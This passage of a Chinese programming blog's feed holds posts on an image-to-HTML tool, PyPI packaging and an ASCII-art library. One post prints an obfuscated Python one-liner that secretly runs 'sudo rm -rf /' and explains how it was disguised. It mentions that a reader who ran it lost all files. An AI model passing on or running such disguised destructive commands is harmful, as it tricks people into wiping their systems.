\ \ \ \ \ \ \ \ \_ /\ \/\ \/\ \ \_\ \_</span><br><span class="line"> \ \_\\ \_\ \_\ \_\\ \____ \ /\______/ \ \_\ \_\ \ \__\\ \_\ \_\ \_\ /\____\</span><br><span class="line"> \/_/ \/_/\/_/\/_/ \/___L\ \ \/_____/ \/_/\/_/ \/__/ \/_/\/_/\/_/ \/____/</span><br><span class="line"> /\____/</span><br><span class="line"> \_/__/</span><br></pre></td></tr></table></figure><p>我把这个程序叫做「img2html」,并上传到了 <a href="https://pypi.python.org/pypi/img2html" target="_blank" rel="noopener">PYPI</a>,所以,你可以直接这样安装:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install img2html</span><br></pre></td></tr></table></figure><p>具体调用方式上,可以直接命令行调用,也可以通过代码调用,具体使用方式写在了 GitHub 的 README 上:<a href="https://github.com/xlzd/img2html" target="_blank" rel="noopener">img2html</a>。</p><p>代码逻辑非常简单,将图片每 N*N 个像素合并成一个像素,并取这 N*N 像素的平均值当做合成的像素的颜色,然后渲染为 HTML 页面中对应位置的文字颜色。代码中虽然使用了 4 个 for 语句,但是其实只是遍历了图片中每个像素一次。</p>]]></content>
<summary type="html">
<p>闲得无聊,写了个程序,将一张图片转换成一个 HTML 页面。<br>如图,左边是原图,右边是一个 HTML 页面,根据文字颜色不同拼出了左边的图片:</p>
<table>
<thead>
<tr>
<th style="text-align:center">原始图片</t
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>Python 乱码指北:一行删掉根目录</title>
<link href="https://xlzd.me/2017/03/14/python-one-line-rm-rf/"/>
<id>https://xlzd.me/2017/03/14/python-one-line-rm-rf/</id>
<published>2017-03-14T00:47:51.000Z</published>
<updated>2019-05-14T06:33:49.581Z</updated>
<content type="html"><![CDATA[<p>之前在知乎看到一个问题:<a href="https://www.zhihu.com/question/37046157" target="_blank">「一行 Python 代码可以实现什么丧心病狂的功能?」</a>,我看着好玩,写了一个答案:</p><blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">> (<span class="keyword">lambda</span> _: getattr(__import__(_(<span class="number">28531</span>)), _(<span class="number">126965465245037</span>))(_(<span class="number">9147569852652678349977498820655</span>)))((<span class="keyword">lambda</span> ___, __, _: <span class="keyword">lambda</span> n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, <span class="keyword">True</span>))</span><br><span class="line">></span><br></pre></td></tr></table></figure></blockquote><blockquote><p>OS X、Linux 有效,需要管理员权限执行,效果感人。</p><p>作者:xlzd<br>链接:<a href="https://www.zhihu.com/question/37046157/answer/101660005" target="_blank">https://www.zhihu.com/question/37046157/answer/101660005</a><br>来源:知乎<br>著作权归作者所有,转载请联系作者获得授权。</p></blockquote><p>原本只是一个恶搞的小玩笑,没想到真的有一个小伙伴试过了这行代码。然后,他的 Mac 被删光了所有东西…… </p><p>那么,这行代码是如何做到的呢?</p><a id="more"></a><hr><p>其实并不复杂,不过是一些代码的伪装罢了。这行代码翻译为最直接版本,也仅仅两行:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line">os.system(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>第一步,我们要省去 <code>import</code>,改成使用 <code>__import__</code> 函数,它接受一个字符串,并返回这个模块本身:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__import__(<span class="string">'os'</span>).system(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>OK,现在已经变成一行了,下面要做的,就是让它越发的看不懂。具体的思路是将尽可能多的内容转换为字符串,然后对字符串做转型,通过 <code>getattr</code> 函数,可以改写为如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getattr(__import__(<span class="string">'os'</span>), <span class="string">'system'</span>)(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>到这一步,先明白一点是 <code>lambda</code> 函数可以定义与执行放在一起的。同时,在 Python 中,函数是可以作为参数传递的:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">In [1]: (lambda n: n*2) (2)</span><br><span class="line">Out[1]: 4</span><br><span class="line"></span><br><span class="line">In [2]: (lambda f: f('10')) (int)</span><br><span class="line">Out[2]: 10</span><br></pre></td></tr></table></figure><p>到这里,想办法将上面三个字符串 <code>os</code>, <code>system</code>, <code>sudo rm -rf /</code> 不再直接写出,而是转换为数字,然后传入一个函数对数字解码到字符串,暂且不关注这个函数的具体定义和数字是什么,之前的代码可以改写如下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda decode: getattr(__import__( decode(NUM1) ), decode(NUM2))(decode(NUM3))) (decode_function)</span><br></pre></td></tr></table></figure><p>已经与回答中的代码越来越像了。那么,如何将字符串映射到一个数字呢?<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">In [3]: 'hello, world.'.encode('hex')</span><br><span class="line">Out[3]: '68656c6c6f2c20776f726c642e'</span><br><span class="line"></span><br><span class="line">In [4]: int('hello, world.'.encode('hex'), 16)</span><br><span class="line">Out[4]: 8271117963530313756381553648686L</span><br><span class="line"></span><br><span class="line">In [5]: hex(8271117963530313756381553648686L)[2:-1].decode('hex')</span><br><span class="line">Out[5]: 'hello, world.'</span><br></pre></td></tr></table></figure></p><p>于是,上面的 <code>decode_function</code> 和对应的数字便可以轻松得到了:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">In [6]: encode = lambda s:int(s.encode('hex'), 16)</span><br><span class="line"></span><br><span class="line">In [7]: decode = lambda x: hex(long(x))[2:-1].decode('hex')</span><br><span class="line"></span><br><span class="line">In [8]: encode('os')</span><br><span class="line">Out[8]: 28531</span><br><span class="line"></span><br><span class="line">In [9]: decode(28531)</span><br><span class="line">Out[9]: 'os'</span><br><span class="line"></span><br><span class="line">In [10]: encode('system')</span><br><span class="line">Out[10]: 126965465245037</span><br><span class="line"></span><br><span class="line">In [11]: decode(126965465245037)</span><br><span class="line">Out[11]: 'system'</span><br><span class="line"></span><br><span class="line">In [12]: encode('sudo rm -rf /')</span><br><span class="line">Out[12]: 9147569852652678349977498820655L</span><br><span class="line"></span><br><span class="line">In [13]: decode(9147569852652678349977498820655L)</span><br><span class="line">Out[13]: 'sudo rm -rf /'</span><br></pre></td></tr></table></figure></p><p>填充到刚才的代码中去:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda decode: getattr(__import__( decode(28531) ), decode(126965465245037))(decode(9147569852652678349977498820655L))) (lambda x: hex(long(x))[2:-1].decode('hex'))</span><br></pre></td></tr></table></figure></p><p>最后我们再将 <code>decode</code> 改装一下,比如 <code>2 == True << True</code>(<code>True == 1</code>),而 <code>-1 == -True</code>,而字符串 <code>hex</code> 则可以通过函数 <code>hex</code> 的 <code>__name__</code> 获得。由此,将其作为参数传入一个 lambda 函数,返回我们需要的 <code>decode</code> 函数,<code>decode</code> 就变成了这样:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True)</span><br></pre></td></tr></table></figure></p><p>组装到一起,将变量名变成下划线,就得到了最终结果:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))</span><br></pre></td></tr></table></figure></p><p><strong>友情提示:请不要轻易尝试。</strong></p>]]></content>
<summary type="html">
<p>之前在知乎看到一个问题:<a href="https://www.zhihu.com/question/37046157" target="_blank">「一行 Python 代码可以实现什么丧心病狂的功能?」</a>,我看着好玩,写了一个答案:</p>
<blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; (<span class="keyword">lambda</span> _: getattr(__import__(_(<span class="number">28531</span>)), _(<span class="number">126965465245037</span>))(_(<span class="number">9147569852652678349977498820655</span>)))((<span class="keyword">lambda</span> ___, __, _: <span class="keyword">lambda</span> n: ___(__(n))[_ &lt;&lt; _:-_].decode(___.__name__))(hex, long, <span class="keyword">True</span>))</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>OS X、Linux 有效,需要管理员权限执行,效果感人。</p>
<p>作者:xlzd<br>链接:<a href="https://www.zhihu.com/question/37046157/answer/101660005" target="_blank">https://www.zhihu.com/question/37046157/answer/101660005</a><br>来源:知乎<br>著作权归作者所有,转载请联系作者获得授权。</p>
</blockquote>
<p>原本只是一个恶搞的小玩笑,没想到真的有一个小伙伴试过了这行代码。然后,他的 Mac 被删光了所有东西…… </p>
<p>那么,这行代码是如何做到的呢?</p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>如何将自己的程序发布到 PyPI</title>
<link href="https://xlzd.me/2017/02/05/upload-pypi/"/>
<id>https://xlzd.me/2017/02/05/upload-pypi/</id>
<published>2017-02-05T15:12:24.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<h2 id="这段是废话"><a href="#这段是废话" class="headerlink" title="这段是废话"></a>这段是废话</h2><p>P.S. 这是一篇非常基础的文章,如果你有相关基础,请不必浪费时间阅读。写这篇文章的初衷是收到知友私信问到了怎么讲自己写的程序发布到 PyPI,与其回复一个人的私信,不如写出来供所有初学的人参考参考。<br>PyPI 的全称是「Python Package Index」,官方介绍如是说:</p><blockquote><p>The Python Package Index is a repository of software for the Python programming language. There are currently 102159 packages here. </p></blockquote><p>托管到 PyPI 的仓库,可以方便地通过 easy_install 或 pip 来安装和更新。比如,你直接「 pip install tornado 」就可以方便地安装 tornado 了。</p><p>概念性的东西,就一笔带过吧。这篇博客中,我将以发布一个名为「jujube_pill」的包到 PyPI 为例,从头到尾讲解如何将自己的程序发布到 PyPI。</p><a id="more"></a><h2 id="代码结构"><a href="#代码结构" class="headerlink" title="代码结构"></a>代码结构</h2><p>这里的示例代码结构非常简单,就一个 setup 文件和一个源码文件,结构如下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">jujube-pill $ tree</span><br><span class="line">.</span><br><span class="line">├── jujube_pill</span><br><span class="line">│ └── __init__.py</span><br><span class="line">└── setup.py</span><br></pre></td></tr></table></figure><p>其中 setup.py 如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> setuptools <span class="keyword">import</span> setup</span><br><span class="line"></span><br><span class="line">setup(</span><br><span class="line"> name=<span class="string">'jujube_pill'</span>,</span><br><span class="line"> version=<span class="string">'0.0.1'</span>,</span><br><span class="line"> author=<span class="string">'xlzd'</span>,</span><br><span class="line"> author_email=<span class="string">'what@the.f*ck'</span>,</span><br><span class="line"> url=<span class="string">'https://zhuanlan.zhihu.com/p/26159930'</span>,</span><br><span class="line"> description=<span class="string">u'吃枣药丸'</span>,</span><br><span class="line"> packages=[<span class="string">'jujube_pill'</span>],</span><br><span class="line"> install_requires=[],</span><br><span class="line"> entry_points={</span><br><span class="line"> <span class="string">'console_scripts'</span>: [</span><br><span class="line"> <span class="string">'jujube=jujube_pill:jujube'</span>,</span><br><span class="line"> <span class="string">'pill=jujube_pill:pill'</span></span><br><span class="line"> ]</span><br><span class="line"> }</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>很多参数都见名之意,所以这里不赘述每个参数的含义。另外有一些参数对于初学者暂时用不上,也暂不表。 install_requires 是这个库所依赖的其它库,当别人使用 pip 等工具安装你的包时,会自动安装你所依赖的包。console_scripts 是这个包所提供的终端命令,比如我希望在安装这个包后可以使用「 jujube 」和「 pill 」两个命令,则按照 setup 文件的写法,当我在终端输入「 jujube 」的时候,将会执行 jujube_pill 包下(<strong>init</strong> 中)的 jujube 函数。</p><p><strong>init</strong>.py 文件如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">jujube</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">print</span> <span class="string">u'吃枣'</span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pill</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">print</span> <span class="string">u'药丸'</span></span><br></pre></td></tr></table></figure><h2 id="上传代码到-PyPI"><a href="#上传代码到-PyPI" class="headerlink" title="上传代码到 PyPI"></a>上传代码到 PyPI</h2><p>在上传之前,可以先通过命令校验 setup 写错了没有:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py check</span><br><span class="line">running check</span><br><span class="line">$</span><br></pre></td></tr></table></figure><p>如果没有输出任何错误,则说明格式正确。</p><p>然后需要在这里注册一个 PyPI 的帐号,注册完成之后,就可以将这个代码库注册到 PyPI 了:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py register</span><br><span class="line"></span><br><span class="line">running register</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">We need to know who you are, so please choose either:</span><br><span class="line"> 1. use your existing login,</span><br><span class="line"> 2. register as a new user,</span><br><span class="line"> 3. have the server generate a new password <span class="keyword">for</span> you (and email it to you), or</span><br><span class="line"> 4. quit</span><br><span class="line">Your selection [default 1]: </span><br><span class="line">1</span><br><span class="line">Username: xlzd</span><br><span class="line">Password: </span><br><span class="line">Registering jujube_pill to https://pypi.python.org/pypi</span><br><span class="line">Server response (200): OK</span><br><span class="line">I can store your PyPI login so future submissions will be faster.</span><br><span class="line">(the login will be stored <span class="keyword">in</span> /Users/xlzd/.pypirc)</span><br><span class="line">Save your login (y/N)?y</span><br></pre></td></tr></table></figure><p>中间一些步骤的输出被我省略了,其中是第一次上传代码到 PyPI,则需要先登录帐号。如果刚才没有在网页端注册帐号,在这里注册也是 OK 的。填好用户名密码之后,就可以登录了。登录成功后会提示你是否保存登录信息,如果选择了 y,则会在 home 目录下生成一个 .pypirc 文件存储你的 PyPI 帐号登录信息。</p><p>接着的操作是打包代码,使用如下命令:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py <打包格式></span><br></pre></td></tr></table></figure><p>打包格式一般使用「 sdist 」或者「 bdist_egg 」,使用前者居多(sdist 支持 pip 安装,bdist_egg 支持 easy_install 安装)。</p><p>打好包之后,通过如下命令上传:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python setup.py upload</span><br></pre></td></tr></table></figure><p>最后去 PyPI 上看下我们刚刚上传的库( <a href="https://pypi.python.org/pypi/jujube_pill" target="_blank" rel="noopener">jujube_pill</a> ):</p><p>其实,刚才的命令也可以合成一条一次执行:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python setup.py register sdist upload</span><br></pre></td></tr></table></figure></p><h2 id="试试看我们自己发布的库"><a href="#试试看我们自己发布的库" class="headerlink" title="试试看我们自己发布的库"></a>试试看我们自己发布的库</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install jujube_pill</span><br></pre></td></tr></table></figure><p>安装完成后,就可以愉快地使用这两个命令了:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ jujube</span><br><span class="line">吃枣</span><br><span class="line">$ pill</span><br><span class="line">药丸</span><br></pre></td></tr></table></figure><p>或者在代码中使用我们刚刚上传的库:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: <span class="keyword">import</span> jujube_pill</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: jujube_pill.jujube()</span><br><span class="line">吃枣</span><br><span class="line"></span><br><span class="line">In [<span class="number">3</span>]: jujube_pill.pill()</span><br><span class="line">药丸</span><br></pre></td></tr></table></figure><p>妥了。</p>]]></content>
<summary type="html">
<h2 id="这段是废话"><a href="#这段是废话" class="headerlink" title="这段是废话"></a>这段是废话</h2><p>P.S. 这是一篇非常基础的文章,如果你有相关基础,请不必浪费时间阅读。写这篇文章的初衷是收到知友私信问到了怎么讲自己写的程序发布到 PyPI,与其回复一个人的私信,不如写出来供所有初学的人参考参考。<br>PyPI 的全称是「Python Package Index」,官方介绍如是说:</p>
<blockquote>
<p>The Python Package Index is a repository of software for the Python programming language. There are currently 102159 packages here. </p>
</blockquote>
<p>托管到 PyPI 的仓库,可以方便地通过 easy_install 或 pip 来安装和更新。比如,你直接「 pip install tornado 」就可以方便地安装 tornado 了。</p>
<p>概念性的东西,就一笔带过吧。这篇博客中,我将以发布一个名为「jujube_pill」的包到 PyPI 为例,从头到尾讲解如何将自己的程序发布到 PyPI。</p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>xart: generate art ascii texts. </title>
<link href="https://xlzd.me/2016/11/04/xart/"/>
<id>https://xlzd.me/2016/11/04/xart/</id>
<published>2016-11-03T16:02:02.000Z</published>
<updated>2019-05-14T06:33:49.584Z</updated>
<content type="html"><![CDATA[<h1 id="xart-generate-art-ascii-texts"><a href="#xart-generate-art-ascii-texts" class="headerlink" title="xart: generate art ascii texts. "></a>xart: generate art ascii texts. <img src="https://img.shields.io/pypi/v/xart.svg?label=version" alt="Version"> <img src="https://img.shields.io/badge/license-WTFPL-007EC7.svg" alt="WTFPL License"></h1><p><code>xart</code> is a pure Python library that provides an easy way to generate art ascii texts. Life is short, be cool.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">██╗ ██╗ █████╗ ██████╗ ████████╗</span><br><span class="line">╚██╗██╔╝██╔══██╗██╔══██╗╚══██╔══╝</span><br><span class="line"> ╚███╔╝ ███████║██████╔╝ ██║</span><br><span class="line"> ██╔██╗ ██╔══██║██╔══██╗ ██║</span><br><span class="line">██╔╝ ██╗██║ ██║██║ ██║ ██║</span><br><span class="line">╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝</span><br></pre></td></tr></table></figure><a id="more"></a><h3 id="Getting-Started"><a href="#Getting-Started" class="headerlink" title="Getting Started"></a>Getting Started</h3><hr><h4 id="help"><a href="#help" class="headerlink" title="help"></a>help</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ xart -h</span><br><span class="line">usage: xart [-h] [-f FONT] [-i] [-s] [-l] [-v]</span><br><span class="line"></span><br><span class="line">xart : generate art ascii texts.</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"> -f FONT, --font FONT font to render with, default random</span><br><span class="line"> -i, --info show information of given font</span><br><span class="line"> -s, --show show random fonts</span><br><span class="line"> -l, --list list all supported fonts</span><br><span class="line"> -v, --version version</span><br></pre></td></tr></table></figure><h4 id="generate-ascii-text-via-random-font"><a href="#generate-ascii-text-via-random-font" class="headerlink" title="generate ascii text via random font"></a>generate ascii text via random font</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ xart test</span><br><span class="line">.-..-..-. .-..--. .-..-. .-..-..-.</span><br><span class="line"> ~ | | ~ | | ~~ | | ~ ~ | | ~</span><br><span class="line"> | | | | _ \| | |</span><br><span class="line"> | | | |`-' |\ | |</span><br><span class="line"> | | | | __ _ | | | |</span><br><span class="line"> `-' `-'`--' `-'`-' `-'</span><br></pre></td></tr></table></figure><h4 id="generate-ascii-text-via-given-font"><a href="#generate-ascii-text-via-given-font" class="headerlink" title="generate ascii text via given font"></a>generate ascii text via given font</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$ xart test -f 3D_Diagonal</span><br><span class="line"></span><br><span class="line"> ___ ___</span><br><span class="line"> ,--.'|_ ,--.'|_</span><br><span class="line"> | | :,' | | :,'</span><br><span class="line"> : : ' : .--.--. : : ' :</span><br><span class="line">.;__,' / ,---. / / ' .;__,' /</span><br><span class="line">| | | / \ | : /`./ | | |</span><br><span class="line">:__,'| : / / | | : ;_ :__,'| :</span><br><span class="line"> ' : |__ . ' / | \ \ `. ' : |__</span><br><span class="line"> | | '.'| ' ; /| `----. \ | | '.'|</span><br><span class="line"> ; : ; ' | / | / /`--' / ; : ;</span><br><span class="line"> | , / | : | '--'. / | , /</span><br><span class="line"> ---`-' \ \ / `--'---' ---`-'</span><br><span class="line"> `----'</span><br></pre></td></tr></table></figure><h4 id="show-all-supported-fonts"><a href="#show-all-supported-fonts" class="headerlink" title="show all supported fonts"></a>show all supported fonts</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ xart -l</span><br><span class="line">xart : generate art ascii texts.</span><br><span class="line"></span><br><span class="line"> 0. 1Row</span><br><span class="line"> 1. 3-D</span><br><span class="line"> ...</span><br><span class="line"> 277. Wow</span><br><span class="line"></span><br><span class="line">All 278 fonts.</span><br></pre></td></tr></table></figure><h4 id="show-font-infomation"><a href="#show-font-infomation" class="headerlink" title="show font infomation"></a>show font infomation</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ xart -i -f Weird</span><br><span class="line">weird.flf (version 2)</span><br><span class="line">by: Bas Meijer meijer@info.win.tue.nl bas@damek.kth.se</span><br><span class="line">fixed by: Ryan Youck youck@cs.uregina.ca</span><br><span class="line">some special characters '#%*' etc. are not matching, they are from other fonts.</span><br><span class="line">Explanation of first line:</span><br><span class="line">flf2 - "magic number" for file identification</span><br><span class="line">a - should always be `a', for now</span><br><span class="line">$ - the "hardblank" -- prints as a blank, but can't be smushed</span><br><span class="line">6 - height of a character</span><br><span class="line">5 - height of a character, not including descenders</span><br><span class="line">20 - max line length (excluding comment lines) + a fudge factor</span><br><span class="line">15 - default smushmode for this font (like "-m 15" on command line)</span><br><span class="line">13 - number of comment lines</span><br></pre></td></tr></table></figure><h4 id="version"><a href="#version" class="headerlink" title="version"></a>version</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ xart -v</span><br><span class="line">xart : generate art ascii fonts, version 0.1.5.</span><br><span class="line"> ____ ____ ______</span><br><span class="line"> / __ \ / / | ___(</span><br><span class="line">( ( ) ) / /) ) | |__</span><br><span class="line">( ( ) ) /_/( ( |___ \</span><br><span class="line">( ( ) ) ) ) \ \</span><br><span class="line">( (__) ) __ ( ( __ _____) )</span><br><span class="line"> \____/ (__) /__\ (__) )_____/</span><br></pre></td></tr></table></figure><h3 id="Installation"><a href="#Installation" class="headerlink" title="Installation"></a>Installation</h3><hr><p><code>xart</code> is hosted on <a href="https://pypi.python.org/pypi/xart" target="_blank" rel="noopener">PYPI</a> and can be installed as such:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install xart</span><br></pre></td></tr></table></figure><p>Alternatively, you can also get the latest source code from <a href="https://github.com/xlzd/xart" target="_blank" rel="noopener">GitHub</a> and install it manually:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git clone git@github.com:xlzd/xart.git</span><br><span class="line">$ cd xart</span><br><span class="line">$ python setup.py install</span><br></pre></td></tr></table></figure><p>For update:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pip install xart --upgrade</span><br></pre></td></tr></table></figure><h3 id="License"><a href="#License" class="headerlink" title="License"></a>License</h3><hr><p>WTFPL (<a href="https://github.com/xlzd/xart/blob/master/LICENSE" target="_blank" rel="noopener">here</a>)</p>]]></content>
<summary type="html">
<h1 id="xart-generate-art-ascii-texts"><a href="#xart-generate-art-ascii-texts" class="headerlink" title="xart: generate art ascii texts. "></a>xart: generate art ascii texts. <img src="https://img.shields.io/pypi/v/xart.svg?label=version" alt="Version"> <img src="https://img.shields.io/badge/license-WTFPL-007EC7.svg" alt="WTFPL License"></h1><p><code>xart</code> is a pure Python library that provides an easy way to generate art ascii texts. Life is short, be cool.</p>
